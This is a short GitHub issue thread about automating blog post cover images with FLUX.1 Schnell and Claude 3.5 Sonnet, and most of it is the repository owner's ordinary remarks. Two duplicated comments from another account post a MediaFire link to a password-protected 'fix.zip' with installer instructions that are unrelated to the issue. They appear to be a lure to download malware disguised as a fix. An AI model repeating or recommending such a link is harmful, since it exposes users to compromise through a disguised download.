### ISSUE TITLE
Automation: New post images powered by FLUX.1 Schnell and Claude 3.5 Sonnet

### ISSUE THREAD

**Issue by arunsathiya** [arunsathiya/portfolio#63]

**Comment by xiaobai-marker** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by xiaobai-marker** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by arunsathiya** [comment]
Handled in https://github.com/arunsathiya/portfolio/compare/aa79f2c79d594e2847b70387c3525689f13e3cc0..7ceffee00a6f136a1c76e3041c3a5f2165d94eba.

**Comment by arunsathiya** [comment]
Although, [I don't like how the `coverImage` frontmatter appears first](https://github.com/arunsathiya/portfolio/commit/5c8638c3e2f531d17b2f3a6cdbda4f6f99b19b86). It should be the last one to match the old posts' pattern.

**Comment by arunsathiya** [comment]
Corresponding Workers' logic was implemented in:

- https://github.com/arunsathiya/portfolio-workers/pull/1
